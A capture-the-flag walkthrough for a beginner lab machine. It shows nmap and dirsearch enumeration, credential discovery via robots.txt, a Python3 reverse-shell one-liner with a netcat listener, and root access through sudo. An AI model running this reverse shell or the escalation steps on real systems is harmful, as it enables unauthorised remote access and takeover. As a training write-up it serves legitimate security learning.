As always we need to enumerate the services running on the machine. Let’s start with a nmap scan on the machine
nmap IP -sV -T4
IP: IP address of the machine
-sV: Enable service detection
-T4: Make the scan faster
$ nmap IP -sV -T4Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–27 11:17 EDT
Nmap scan report for IP
Host is up (0.39s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.24 seconds
Now we know there are 2 open ports running 22 and 80.
22 runs SSH
80 runs HTTP
Let’s visit port 80. (Webserver)
Checking the page source we find a interesting username.
Let’s use dirsearch to find all the sub directories.
sudo dirsearch -u http://IP -x 404,403 -t 200
-u: URL to brute
-x: Hide specific status codes
-t: Specify the number of threads
[11:27:52] 301–311B — /assets -> http://10.10.73.35/assets/
[11:27:53] 200–2KB — /assets/
[11:27:58] 200–1KB — /index.html
[11:28:00] 200–882B — /login.php
[11:28:05] 200–17B — /robots.txt
$ curl http://10.10.73.35/robots.txt
We find a weird text. Maybe this is a password?
Let’s try that in the
We can successfully login using those credentials.
After logging in we can see this page
Let’s try to use the
ls -la command to list all the files.
We can see a lot of files. Now we can try to get a reverse shell on the machine using a python reverse shell.
Firstly let’s check if the machine has python or python3. We can check that by using
which python or
We can see that it has python3 installed. So let’s use a python3 reverse shell.
On the attackers machine lets set up a netcat listener using :
nc -lvnp 1337
You can specify any port, I like to use the port
You can find the reverse shell code here → https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
(Remember to change
python in the beginning to
python3 as the machine has
Copy that reverse shell code and use any text edittor to change the IP address to your tun0 IP (
ifconfig tun0) and the port you set for listening the reverse connection in netcat. (We specified 1337)
So the code would look like this for me (I have changed
python3, port to 1337 and IP to the IP address of my tun0 interface)
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“yourtun0ip”,1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’
Let’s paste this in the command execution panel.
Make sure to set up the listener
nc -lvnp 1337
Now lets look at the contents of
www-data@ip-10–10–180–175:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
mr. ........ hair
This gives us the answer for the first question : What is the first ingredient Rick needs?
Let’s look at the
www-data@ip-10–10–180–175:/var/www/html$ cat clue.txt
Look around the file system for the other ingredient.
I first went to the
/home directory where we found 2 users
Browsing in rick’s directory we find the second ingredient.
The contents of the file answers the second question : Whats the second ingredient Rick needs?
Remeber to use
”” because the name of the file is 2 words. Else you will get an error like this.
cat “second ingredients”
www-data@ip-10–10–180–175:/home/rick$ cat “second ingredients”
cat “second ingredients”
1 ..... tear
Now for the final task.
I got a hint that the final answer is hidden in the
www-data@ip-10–10–180–175:/home/rick$ cd /root
bash: cd: /root: Permission denied
We get a permission denied error, so let’s escalate to the root user.
The most common way is to check the
sudo rights of the user using the
sudo -l command.
We can run any command with sudo to get root user access
sudo su. This will give us the root shell
Let’s browse the
/root directory and get the answer to task 3 : Whats the final ingredient Rick needs?